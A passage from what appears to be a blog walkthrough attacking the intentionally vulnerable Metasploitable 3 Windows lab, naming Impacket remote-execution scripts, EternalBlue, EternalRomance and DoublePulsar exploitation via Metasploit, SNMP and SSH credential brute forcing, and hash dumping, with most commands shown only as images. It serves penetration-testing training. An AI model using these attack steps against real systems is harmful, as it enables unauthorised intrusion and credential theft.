classes and functions for working with various Windows network protocols. It is a centerpiece of many different pentesting tools. Apart from being a library, it also contains number of examples which we can use right away for remote command execution. <p>The following table provides summary of all discussed Impacket Remote Code Execution methods:<table border="1" cellspacing="0" cellpadding="0"><tbody><tr><td width="171" valign="top"><p align="center"><b><font size="3">Method</font></b></p></td><td width="171" valign="top"><p align="center"><b><font size="3">RCE type</font></b></p></td><td width="171" valign="top"><p align="center"><b><font size="3">Port(s) used</font></b></p></td></tr><tr><td width="171"><p align="center"><font size="3">psexec.py</font></p></td><td width="171"><p><font size="3">interactive shell</font></p></td><td width="171" valign="top"><p><font size="3">tcp/445</font></p></td></tr><tr><td width="171"><p align="center"><font size="3">dcomexec.py</font></p></td><td width="171"><p><font size="3">semi-interactive shell</font></p></td><td width="171" valign="top"><p><font size="3">tcp/135</font><p><font size="3">tcp/445</font><p><font size="3">tcp/49751 (DCOM)</font></p></td></tr><tr><td width="171"><p align="center"><font size="3">smbexec.py</font></p></td><td width="171"><p><font size="3">semi-interactive shell</font></p></td><td width="171" valign="top"><p><font size="3">tcp/445</font></p></td></tr><tr><td width="171"><p align="center"><font size="3">wmiexec.py</font></p></td><td width="171"><p><font size="3">semi-interactive shell</font></p></td><td width="171" valign="top"><p><font size="3">tcp/135</font><p><font size="3">tcp/445</font><p><font size="3">tcp/50911 (Winmgmt)</font></p></td></tr><tr><td width="171"><p align="center"><font size="3">atexec.py</font></p></td><td width="171"><p><font size="3">command</font></p></td><td width="171" valign="bottom"><p><font size="3">tcp/445</font></p></td></tr></tbody></table><p>This module uses a similar approach to psexec but executing commands through WMI.<p><a href="https://drive.google.com/uc?id=1k5aJEFgYIjymIA1KjiIc1IzPr6AJva4W" target="_blank"><img width="806" height="466" title="Exploiting SMB with Impacket" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting SMB with Impacket" src="https://drive.google.com/uc?id=136dYZRQlZD_-bt1l-z8pO4a9mWYa8YV4" border="0"></a><p>Unfortunately, this module doesn’t work in the current Kali release due to Python syntax incompatibilities. The previous image was obtained using Kali 2019.1.<h4>Impacket DCOM Exec</h4><p>A different approach is to use DCOM to execute remote commands, like <b><em>creating a user</em></b> or anything else:<p><a href="https://drive.google.com/uc?id=1-OO-h5Qf0UKeg8pRp6m181NP457efIcp" target="_blank"><img width="806" height="331" title="Creating a user with Impacket" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating a user with Impacket" src="https://drive.google.com/uc?id=1xd9yssitwns8QF0prO9TmvWpsQjSZkNn" border="0"></a><p>Unfortunately, this module also doesn’t work in the current Kali release. But there is another module that tries to dump hashes from the remote machine without executing any agent there.<p><a href="https://drive.google.com/uc?id=1EEGAm2_Qv7fxBLb6P-SHaR7kK34cHK28" target="_blank"><img width="809" height="676" title="Dumping hashes with Impacket" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Dumping hashes with Impacket" src="https://drive.google.com/uc?id=1kUN7M9Bnokrbjc3Ni9zIZccbQp4WmDiD" border="0"></a><h4>Other Metasploit modules</h4><p>There are other modules created to attack the SMB service, but they require some social engineering because the target needs to access a share on the attacker machine:<ul><li>NTLM Capture (<b><em>auxiliary/server/capture/smb</em></b>)</li><ul><li>This module provides an SMB service that can be used to capture the challenge-response password hashes of SMB client system.</li><li>Need to run in coordination with <b><em>auxiliary/spoof/nbns/nbns_response</em></b></li></ul><li>DoS (<b><em>auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop</em></b>)</li><ul><li>It will just crash the remote machine</li></ul></ul><h3>Eternal Romance Exploit</h3><p>Eternal Romance is one of the SMBv1 exploits from the leaked NSA exploit collection. This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal <b>psexec</b> payload code execution is done:<p>Check if target is vulnerable:<p><a href="https://drive.google.com/uc?id=1YXptdb3SOS9KyfYbRPIXcKUX8Djug_bh" target="_blank"><img width="806" height="132" title="Checking for Eternal Romance vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking for Eternal Romance vulnerability" src="https://drive.google.com/uc?id=1z0KXjKLbe01Q--ahBf6zJiKEQeM6OS7J" border="0"></a><p>Exploit:<p><a href="https://drive.google.com/uc?id=1LyhYMtw-h7TvX7UQ7y_3cMslPFozprsx" target="_blank"><img width="806" height="402" title="Exploiting the Eternal Romance vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting the Eternal Romance vulnerability" src="https://drive.google.com/uc?id=1ZX-QPMRqx3M_nLIJAqqm6eLynaWqVd5u" border="0"></a><p>It is also possible to use the web delivery method to exploit this vulnerability:<ul><li>Run the <b><em>exploit/multi/script/web_delivery</em> </b>module (set <b>Target 3-Regsvr32</b>)</li><ul><li>Get a command</li></ul><li>Run the <strong><em>auxiliary/admin/smb/ms17_010_command</em> </strong>module</li><ul><li>Use the previous command</li></ul><li>Get a meterpreter shell</li></ul><p><a href="https://drive.google.com/uc?id=1QDcqeRb5ztBONBdoevozwtv7uFXGbT5w" target="_blank"><img width="806" height="348" title="Exploiting the Eternal Romance vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting the Eternal Romance vulnerability" src="https://drive.google.com/uc?id=1-Bxrusl-Pe2YapPaDtOaPZ5hek2T9xk5" border="0"></a></p><h5><a href="https://drive.google.com/uc?id=1YHhLLAhpfY8GR2CMxrt5gFpbDl2uQr5c" target="_blank"><img width="796" height="570" title="Exploiting the Eternal Romance vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting the Eternal Romance vulnerability" src="https://drive.google.com/uc?id=1QE6XZ8x2XrvAWt5bTEVKefWtHdxn_dmy" border="0"></a></h5><h5><br></h5><h3>Eternal Blue Exploit</h3><p>Eternal Blue is the exploit used to launch the famous WannaCry ransomware attack. Try using Nmap to check for this vulnerability:<p><a href="https://drive.google.com/uc?id=1gGpnYvuZX3fXFuh6uZaMOvS6DXY1FsTV" target="_blank"><img width="806" height="340" title="Checking for Eternal Blue vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking for Eternal Blue vulnerability" src="https://drive.google.com/uc?id=1pujaB7daU9_LvzpRtF0fpJ7PR0TQxOl8" border="0"></a><p>Exploit:<p><a href="https://drive.google.com/uc?id=1Ufs4HniekbBjkxKgIpop-UWqr5GluYLg" target="_blank"><img width="799" height="574" title="Exploit Eternal Blue" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploit Eternal Blue" src="https://drive.google.com/uc?id=1kLVeyJeAsEXaVgWYu1dS2EZV8gottMb9" border="0"></a><h3>Double Pulsar Exploit</h3><p>You can deploy a backdoor to the remote machine. First, clone the appropriate GitHub repository:<p><a href="https://drive.google.com/uc?id=10semGLXb9WCzmYzNHHGBu5lWctC-d1YT" target="_blank"><img width="806" height="325" title="Preparing the Double Pulsar payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Preparing the Double Pulsar payload" src="https://drive.google.com/uc?id=1g69afP6E-202gI_xK_MsTLcfpr19Ck5o" border="0"></a><p><b>NOTE</b>: You need to install wine32 before running this script<ul><li><strong>dpkg --add-architecture i386</strong></li><li><strong>apt-get update</strong></li><li><strong>apt-get install -y wine32</strong></li></ul><p>Deploy the backdoor:<p><a href="https://drive.google.com/uc?id=1zdulVbMVHFLqqWxb04ff9oPRde-2hwYi" target="_blank"><img width="806" height="369" title="Deploying the Double Pulsar backdoor" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Deploying the Double Pulsar backdoor" src="https://drive.google.com/uc?id=1Gm6UzjHcoM7hJUolcnLH1CXSYD_Az2v0" border="0"></a><p>Exploit using Metasploit<p><a href="https://drive.google.com/uc?id=1qdVZf-ARBT4YDy5nMwjpavNUJmsN94LS" target="_blank"><img width="806" height="312" title="Exploiting Double Pulsar" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting Double Pulsar" src="https://drive.google.com/uc?id=18ruYs62ZT3FppPZ3pky9qU_6pvXIz1JY" border="0"></a><h3>Exploiting SMB using Impacket</h3><p>The<b> <em>psexec.py</em></b> script lets you execute processes on remote windows systems, copy files on remote systems, process their output and stream it back. It allows execution of remote shell commands directly with the full interactive console without having to install any client software.</p><p><a href="https://drive.google.com/uc?id=1dXTX-C1uNtYc_GaoV7x5vzSEWyiG-4UG" target="_blank"><img width="806" height="311" title="Exploiting SMB with Impacket scripts" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting SMB with Impacket scripts" src="https://drive.google.com/uc?id=1C-SS4IAF5zMMUt7NnXXV_tliII_R0yaN" border="0"></a><p>The <b><em>smbexec.py</em></b> method takes advantage of the native Windows SMB functionality to execute arbitrary commands on the remote system. This approach does not require anything to be uploaded on the remote system and is therefore somewhat less prone to detection.<p><a href="https://drive.google.com/uc?id=1GcD1thXClG0pyKp9bPcMlcqDBuJlWqoV" target="_blank"><img width="806" height="156" title="Exploiting SMB with Impacket scripts" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting SMB with Impacket scripts" src="https://drive.google.com/uc?id=1efoEdQv43dA-Sbvzcuw9MSjByn_Z0v7y" border="0"></a><p><strong></strong><p>The <b><em>wmiexec.py</em></b> script uses Windows Management Instrumentation (WMI) interface of the remote Windows system to spawn a semi-interactive shell. Similarly as dcomexec method, wmiexec requires communication over 3 network ports / services. <p>First it uses ports tcp/135 and tcp/445, and ultimately it communicates with the Winmgmt Windows service over dynamically allocated high port such as tcp/50911. This makes the wmiexec method more noisy than the other methods.<p><a href="https://drive.google.com/uc?id=1oQxbYb8hbNw4E_m-M-mAEO943aTih_SO" target="_blank"><img width="806" height="187" title="Exploiting SMB with Impacket scripts" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Exploiting SMB with Impacket scripts" src="https://drive.google.com/uc?id=1ICPsO-igYcNt7ARw6WKDP3OJqQl-7vrv" border="0"></a><p>There are other Impacket scripts, not all of them allowing RCE but some of them potentially very useful against a Domain Controller. You can find them at <b><em>/usr/share/doc/python3-impacket/examples</em></b><p><p><a title="Metasploitable 3 Windows Walkthrough: Part VI" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-w2k8-walkthrough-part_47.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com2tag:blogger.com,1999:blog-6396309617370994433.post-42199715433974270002020-11-05T04:23:00.000-08:002020-11-21T04:19:38.567-08:00Metasploitable 3 Windows Walkthrough: Part IV<h2>Exploiting Port 137 (UDP) – NetBIOS Name Service</h2><p>The name service operates on UDP port 137. The name service primitives offered by NetBIOS are:<ul><li>Add name – registers a NetBIOS name.</li><li>Add group name – registers a NetBIOS “group” name.</li><li>Delete name – un-registers a NetBIOS name or group name.</li><li>Find name – looks up a NetBIOS name on the network.</li></ul><p>Usually, not exploitable but useful for enumeration purposes.</p><h3>Enumerating using NBTScan</h3><p>NBTScan is a command line tool used for scanning networks to obtain NetBIOS shares and name information. It can run on both Unix and Windows and ships with Kali Linux by default.<p><a href="https://drive.google.com/uc?id=1L3JY3hkCIVDSxNPxHzjpKadbQbpYPM39" target="_blank"><img width="640" height="391" title="Enumerating with NBTScan" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with NBTScan" src="https://drive.google.com/uc?id=1YsBf2i8xaXRZ5usxu4eFlTufT1NqpIPt" border="0"></a><p>In this case, not a lot of information but always better than nothing.<h3><a name="_Toc52385132"></a></h3><a name="more"></a><h3>Enumerating using Nmap</h3><p>Nmap contains a handy little script as part of the Nmap Scripting Engine that we can also use to discover NetBIOS shares. This has the advantage that it can be ran with other NSE scripts, ultimately saving time when enumerating many different things on a network.<p><a href="https://drive.google.com/uc?id=19BdxbEbBA3AbN-kHnpMYnQnlhkgKA6sS" target="_blank"><img width="806" height="201" title="Enumerating with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with Nmap" src="https://drive.google.com/uc?id=1pyHoqoS0bJ4D57sci1-12nmOxRDWOn72" border="0"></a><h3>Enumerating using Metasploit</h3><p>As expected, MSF has some modules to be used against NetBIOS. Only on currently produces useful info:<p><a href="https://drive.google.com/uc?id=1cjd8v517url2XRwDmOgmdWEOZcMPTogs" target="_blank"><img width="806" height="146" title="Enumerating with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating with Metasploit" src="https://drive.google.com/uc?id=1KspI-6VxemOjJxh0IWh7zeau6jD6L1I9" border="0"></a><h2>Exploiting Port 139 – NetBIOS Session Service</h2><p>A NetBIOS name is up to 16 characters long and usually, separate from the computer name. Session mode lets two computers establish a connection, allows messages to span multiple packets, and provides error detection and recovery. Two applications start a NetBIOS session when one (the client) sends a command to “call” another client (the server) over TCP Port 139.<h3>Enumerating using Nmap</h3><p>Try to check the correct service version with Nmap:<p><a href="https://drive.google.com/uc?id=1gJjFS8KPzhxCFfwVtDazh1POE3qe5447" target="_blank"><img width="806" height="165" title="Checking NetBIOS version with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking NetBIOS version with Nmap" src="https://drive.google.com/uc?id=1cBbqjd9CE-E-R3jV_ZvXXFmITu4GCbxp" border="0"></a><p>Only a few Nmap scripts can be run against port 139 to produce some valid info:<p>Not really satisfying, right? Two other scripts might reveal some info:<p><a href="https://drive.google.com/uc?id=1un7DxCNMVSAl2GDyp_kU_FWHAmgWNFqx" target="_blank"><img width="794" height="227" title="Getting NetBIOS info with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting NetBIOS info with Nmap" src="https://drive.google.com/uc?id=1VOw1myaJTkfx4mM-_8mA_uC08-BCoLpc" border="0"></a><h2><a href="https://drive.google.com/uc?id=1FwhkV9GOkQ2g_Qzlw3QZaiU-WAVpKdcM" target="_blank"><img width="607" height="213" title="Getting NetBIOS info with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Getting NetBIOS info with Nmap" src="https://drive.google.com/uc?id=1fY9lPMsWvU9sq8_nlYK81-6ABEReEy1B" border="0"></a></h2><h2>Exploiting Port 161 (UDP) – SNMP</h2><p>Simple Network Management Protocol is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behavior.<h3>Enumerating SNMP using Metasploit</h3><p>MSF has several modules to enumerate a target using the SNMP features.<p>This one will only list the remote users:<p><a href="https://drive.google.com/uc?id=1Djv8ToPgjhjpfX0JTcbMSypv8A8J7xC1" target="_blank"><img width="825" height="135" title="Enumerating SNMP with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SNMP with Metasploit" src="https://drive.google.com/uc?id=1vKHZCBUZPxp3SErqsZq6k94Mkuj4GjmS" border="0"></a><p>These results can now be used to attack other services.<p>This module will give you a full description of the remote system:<p><a href="https://drive.google.com/uc?id=1AjsbjoXCWqW0tGOJAFvkh7OiCPodbfqR" target="_blank"><img width="826" height="563" title="image" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SNMP with Metasploit" src="https://drive.google.com/uc?id=1m1iGYc7aNeYeib1MT2vMCwa2uczSz2HH" border="0"></a><h3>Enumerating SNMP using Nmap</h3><p>Nmap has several NSE scripts that can be used against hosts where SNMP service is running:<p><a href="https://drive.google.com/uc?id=1BZHbLRpVRBka-7S8JCKZ7W_I_eNLDLe1" target="_blank"><img width="405" height="270" title="Nmap SNMP scripts" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Nmap SNMP scripts" src="https://drive.google.com/uc?id=1NzN6BUsObljkYb3L-FAq9JPxSrYszohn" border="0"></a><p>Most scripts will give enumeration information, but you might want to exploit the remote machine directly. Try to brute force the SNMP community strings:<p><a href="https://drive.google.com/uc?id=1GPQOHjuSr7fc0OPwFO93yPhXSdt-zig9" target="_blank"><img width="806" height="95" title="Brute forcing SNMP with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SNMP with Nmap" src="https://drive.google.com/uc?id=1A700ORdw9Jk2y0JoRuFf8wOKcgfx3lnD" border="0"></a><p>For whatever reason, Nmap 7.80 freezes and the script never displays any result.<p>But Nmap version 7.4 worked perfectly, displaying the “<b><em>public</em></b>” string:<p><a href="https://drive.google.com/uc?id=16-Eq7rlOk34UWn_n0i8bY5ezYeh3uKPz" target="_blank"><img width="806" height="218" title="Brute forcing SNMP with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SNMP with Nmap" src="https://drive.google.com/uc?id=1xU_tgAOCYUHQ3L03tRecHOrfeLIqp96k" border="0"></a><p>Nice! You have got SNMP community string as “public”. Many devices come with default SNMP community strings as public, private, etc. These community strings are used as credentials to read and write SNMP information depending on the configuration. When an attacker, finds an SNMP community string, he can read lots of juicy information from the target machine if the configuration is Read-Only. An attacker can also make modifications if the configuration is Read-Write.<p>Some of the other scripts will also produce important information about the remote system:<p><a href="https://drive.google.com/uc?id=14PdL6642KU-9BBDQbsL7xsuGKWaJ4eLi" target="_blank"><img width="806" height="356" title="Enumerating SNMP with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SNMP with Nmap" src="https://drive.google.com/uc?id=1G_76-TEk1a_vO6NciEX741c1cUTcYwk1" border="0"></a><h3><a href="https://drive.google.com/uc?id=1C7mcWiA2evOfvajLhTTZSSzM-5_XCfO1" target="_blank"><img width="806" height="449" title="Enumerating SNMP with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SNMP with Nmap" src="https://drive.google.com/uc?id=1UNnY5UlpFzY35G5Q5TL27lPxRpuZYPcR" border="0"></a></h3><h3><a href="https://drive.google.com/uc?id=1aW2G1YBN7CU8SgEAt1Z10ec-H7hROIxZ" target="_blank"><img width="805" height="535" title="Enumerating SNMP with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SNMP with Nmap" src="https://drive.google.com/uc?id=10x_-zmmLtxgzv3BkeuPf5iDVf2JmbV8V" border="0"></a></h3><h3><br></h3><h3>Enumerating SNMP using snmp-check</h3><p>This is simple SNMP enumerator but it will give you a lot of information:<p><a href="https://drive.google.com/uc?id=1HDHx1-kcHCW_IxezXQ1sw1WJ6vdiNrEE" target="_blank"><img width="688" height="818" title="Enumerating SNMP with snmp-check" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SNMP with snmp-check" src="https://drive.google.com/uc?id=1XyY4n0_fztER3JE2gzY0BJiwZ0oOzMks" border="0"></a><p>MSF’s <b><em>snmp_enum</em> </b>module is an implementation of this tool.<h3>Brute forcing SNMP using onesixtyone</h3><p>Another tool to bruteforce SNMP community strings is <b><em>onesixtyone</em></b>. You can easily find the <b><em>public</em></b> string.<p><a href="https://drive.google.com/uc?id=1XFV7Ki9G44mmNLP8XP-P3DQdpwtI4E0z" target="_blank"><img width="806" height="95" title="Brute forcing SNMP with onesixone" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SNMP with onesixone" src="https://drive.google.com/uc?id=18rvkv8QSpEu3PxHw_sLq1f0Ae-bl-Mn6" border="0"></a><p>You can use the dictionary file from onesixtyone tool itself. This can be much faster than Nmap, but it all depends on the quality of the dictionary file.<h3>Brute forcing SNMP using snmpwalk</h3><p>SNMPWalk is a popular tool for testing SNMP. This tool acts as SNMP client, and you can use it for your penetration testing when you need to make requests to the SNMP service on the target host.<p>You can also use this tool to check if a specific community string exists or not. Try to see if “<b><em>public</em></b>” community string exists. <p><a href="https://drive.google.com/uc?id=13n8pcDb-JY2BzDgpgiLhOv3538SOz-xI" target="_blank"><img width="701" height="353" title="Checking public string with SNMPWalk" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking public string with SNMPWalk" src="https://drive.google.com/uc?id=1wl4cacEBUUtvejCjOUllxydvLFSARZRi" border="0"></a><p>If “public” community string is supported, we will be able to see the output as shown in the above figure. Now, try another community string:<p><a href="https://drive.google.com/uc?id=1RbG8BbXkXBaNIo_Tshw4hcvzMCccxpCT" target="_blank"><img width="490" height="78" title="Checking private strings with SNMPWalk" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Checking private strings with SNMPWalk" src="https://drive.google.com/uc?id=16zM0Qs9qV6mPxJeCBytyU5AT-YEEDNop" border="0"></a><p>As you can see, there is no response from the target host as this community string is not supported. This is how you can use this tool to determine if a specific community string is allowed or not.<h3>Attacking the SNMP service</h3><p>Use <b><em>snmpwalk</em></b> to extract the SNMP data and display it on the terminal. The following command can be used to filter the value of <b><em>sysName</em></b>.<p><a href="https://drive.google.com/uc?id=1nuQe_vbe9O9LtSBhJRyNy3Ubu7NpO-_p" target="_blank"><img width="543" height="70" title="Filtering sysname with snmpwalk" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Filtering sysname with snmpwalk" src="https://drive.google.com/uc?id=1Amxi1yN_P-83sej6UwuVC5VYUZtCE00k" border="0"></a><p>Other option is to use the <b><em>snmpget</em></b> command:<p><a href="https://drive.google.com/uc?id=1aWYMFDVYcVOB2YChy5z98NDx6QubHEdo" target="_blank"><img width="527" height="67" title="Filtering sysname with snmpget" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Filtering sysname with snmpget" src="https://drive.google.com/uc?id=1ugKFxvfOFbJ61pXmZXXgUWAM5mSJPQZA" border="0"></a><p>If the SNMP service was misconfigured with “rw” authorization, an attacker could modify these values using the <b><em>snmpset</em></b> utility. <p><a href="https://drive.google.com/uc?id=1XnmmqrqFUqc6Pc3fc7lmaF-XUNtiJJxh" target="_blank"><img width="553" height="128" title="Changing sysname with snmpset" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Changing sysname with snmpset" src="https://drive.google.com/uc?id=1dKem2qb63WWJxURKw8_qdrGsdHg5cmeO" border="0"></a><p>Similarly, you can change the values of any object thus spoofing the responses from responses from SMTP service.<p><b>NOTE</b>: By default, the SNMP service in Metasploitable 3 is set to <b><em>Read Only</em>.</b> If you want to test this attack, you have to change that setting:<p><a href="https://drive.google.com/uc?id=1RyTuueuj_lWuDiLr2LgvdHwf1hmWLi6y" target="_blank"><img width="805" height="588" title="image" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="image" src="https://drive.google.com/uc?id=1fRFdc8u4v_A2HI66oII-ze6dPUGPxnPV" border="0"></a><p><br><p><p><a title="Metasploitable 3 Windows Walkthrough: Part V" href="https://myhackinglessons.blogspot.com/2020/11/metasploitable-3-w2k8-walkthrough-part-v.html"><br></a></p></p>Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-29578732980265923972020-11-04T17:10:00.000-08:002020-11-21T04:18:35.524-08:00Metasploitable 3 Windows Walkthrough: Part III<h2>Exploiting Port 22 – SSH</h2><p>First, a reminder of the information Nmap returned about the SSH service after a port scan:<p><a href="https://drive.google.com/uc?id=1RMsK-HoHkonhLNp25Tg_1GdvREfQMA4u" target="_blank"><img width="789" height="50" title="Port 22 Nmap scan results" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Port 22 Nmap scan results" src="https://drive.google.com/uc?id=1rfIav1z8nMBTPVtAG1ICgxkcX_Bz0IC2" border="0"></a><p>The first challenge, when cracking SSH credentials via brute force, is to find usernames. There are two methods to do this:</p><ul><li>Guess usernames from services</li><li>Obtain usernames from a file on the machine</li></ul><p>It would be great if we could log in via SSH as system, but this is usually disabled. To be successful, we will need a list of users on the system. This can be obtained in many ways, sometimes credentials are immediately reported either by Legion or by OpenVAS.<p><a href="https://drive.google.com/uc?id=1ONzVNqE4AjY_gHqO14N5gDfK9HqWryfS" target="_blank"><img width="822" height="289" title="Hydra results displayed in the Legion scan" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Hydra results displayed in the Legion scan" src="https://drive.google.com/uc?id=1sldoYv5CgExAdAkCnSsbou2blNBTUa10" border="0"></a><p><a href="https://drive.google.com/uc?id=1QMUbY69wTlAcGRxlPB4BZZ3kFJbTKUcQ" target="_blank"><img width="815" height="188" title="OpenVAS results displaying SSH credentials" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OpenVAS results displaying SSH credentials" src="https://drive.google.com/uc?id=1QYv8eiOAxfAjit0nYGt1LDZ9p0nb7XiN" border="0"></a><p>Once you have the usernames, you can try and crack the passwords.<ul><li>For password wordlists, use the ones provided with Kali or use SecLists from Daniel Miessler on Github: <b><em>https://github.com/danielmiessler/SecLists.</em></b></li><li>If you have usernames only, use Hydra to brute-force credentials.</li><li>If you have usernames and password hashes, use John the Ripper to brute-force credentials.</li></ul><p>Besides, keep in mind that sometimes it will be easy to get credentials for other running services. Then, using the previously identified credentials it is easy to create a small custom list of usernames and passwords and attempt to get more using the usual tools.<h4><a name="_Toc52385123"></a></h4><a name="more"></a><h3>Brute forcing SSH using Hydra</h3><p>Once you have a list of credentials, you can use Hydra as you did for the FTP service: <p><a href="https://drive.google.com/uc?id=1bMuKSQlVhqvOW_xoGuWvZbCmrPIxWnWf" target="_blank"><img width="806" height="161" title="Brute forcing SSH with Hydra" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH with Hydra" src="https://drive.google.com/uc?id=1yZ8gbyHdLAwJKU1iGalB-Rn8MZDhvvq9" border="0"></a><h3>Brute forcing SSH using Metasploit</h3><p>Metasploit has an auxiliary module that will test SSH credentials on a range of machines and report successful logins. If you have connected to a database, this module will record successful logins and hosts so you can track your access.<p>Besides, each successful login will immediately open a session on the remote machine. Then, this session can possibly be upgraded to a Meterpreter session.<p><a href="https://drive.google.com/uc?id=15oJR-b4HLw2cv0BQ7tj2yV7cWx7aLL6N" target="_blank"><img width="806" height="423" title="Brute forcing SSH with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH with Metasploit" src="https://drive.google.com/uc?id=1K-QPNa0Wu6J_vZaRI8cnfFLEhTlPxvYD" border="0"></a><p>You will get two high privilege command shell sessions, but it is not possible to upgrade them to Meterpreter…!<p><strong>NOTE:</strong> You can see the module advanced options by typing <b><em>show advanced</em></b> or just <b><em>advanced</em></b>.<h3>Brute forcing SSH using Nmap</h3><p>Using Kali’s wordlists, you will get some results. <p><a href="https://drive.google.com/uc?id=12sKm-anoOq656PTyasNGH4vMJg28BxOt" target="_blank"><img width="806" height="131" title="Brute forcing SSH with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH with Nmap" src="https://drive.google.com/uc?id=1PUBZNBEBKbp92kALu-nMy3IoUoJC9eTA" border="0"></a><p><a href="https://drive.google.com/uc?id=1Uagsf4qH2BWdr_y_Jrvd-jqw1f7TX21q" target="_blank"><img width="806" height="131" title="Brute forcing SSH with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH with Nmap" src="https://drive.google.com/uc?id=1lrgQK5ANXsSKVq9yzBMPJialf-HDtQIG" border="0"></a><p>And you can try with your own custom wordlists.<p><a href="https://drive.google.com/uc?id=1Kt3iyPieuOrJ77Yao5n92uJ_25g9q_lW" target="_blank"><img width="806" height="245" title="Brute forcing SSH with Nmap using custom wordlists" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH with Nmap using custom wordlists" src="https://drive.google.com/uc?id=12v5AxnZ7EI23ZKS6Nin5THP0xHFrFqJz" border="0"></a><h3><a href="https://drive.google.com/uc?id=1dVdCAqWWCPqCMSst2TFr4ZriNHbHQSxH" target="_blank"><img width="806" height="178" title="Brute forcing SSH with Nmap using custom wordlists" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Brute forcing SSH with Nmap using custom wordlists" src="https://drive.google.com/uc?id=1VE6tBAtS6fi-x5WSZtenYjpTbmIErG_h" border="0"></a></h3><h3>Enumerating SSH using Metasploit</h3><p>Take a close look at the OpenVAS results and you will find something else:<p><a href="https://drive.google.com/uc?id=1M50GKGw3XrYQoRZv_ntJWiCUM6YjmPEu" target="_blank"><img width="806" height="83" title="OpenVAS reporting enumeration vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="OpenVAS reporting enumeration vulnerability" src="https://drive.google.com/uc?id=15D2BqXVN0o8oksGGU9D_PlOXSzINjjMO" border="0"></a><p>This vulnerability will allow you validate which usernames are used by the SSH service.<p><a href="https://drive.google.com/uc?id=1MyUETNdDUnUth3tXUWZHeX5K1LKcPxZd" target="_blank"><img width="806" height="287" title="Enumerating SSH with Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SSH with Metasploit" src="https://drive.google.com/uc?id=1rFnLrgbOeq0_JovxEL1-uybvcuuOk8WH" border="0"></a><p>Obviously, it won’t create any session but it will help you in the refinement of the users list by rejecting all the invalid usernames. Now you can try to brute force the passwords only for these users.<h2>Exploiting Port 80 – IIS</h2><p>A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who successfully exploited this vulnerability could execute arbitrary code in the context of the System account.<h3>IIS Denial of Service</h3><p>This vulnerability was reported by OpenVAS as being of extreme severity. It is identified by the number of the Microsoft Security Bulletin that explains it <em><strong>(MS15-034</strong></em>) and by its CVE (<b><em>2015-1635</em></b>).<p>Search for it on your Kali system:<p><a href="https://drive.google.com/uc?id=1XJQYbLBM1e8qFvHcegDa1h36mDo1dM2w" target="_blank"><img width="806" height="139" title="Using searchsploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Using searchsploit" src="https://drive.google.com/uc?id=1PZ5JNK9v1Yx-erQqV0qYAvaNkwgk8Uyo" border="0"></a><p><a href="https://drive.google.com/uc?id=1lCcEejHUMRtpEn6PnElJbl2iB5MpAxtN" target="_blank"><img width="806" height="125" title="Searching in Metasploit" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Searching in Metasploit" 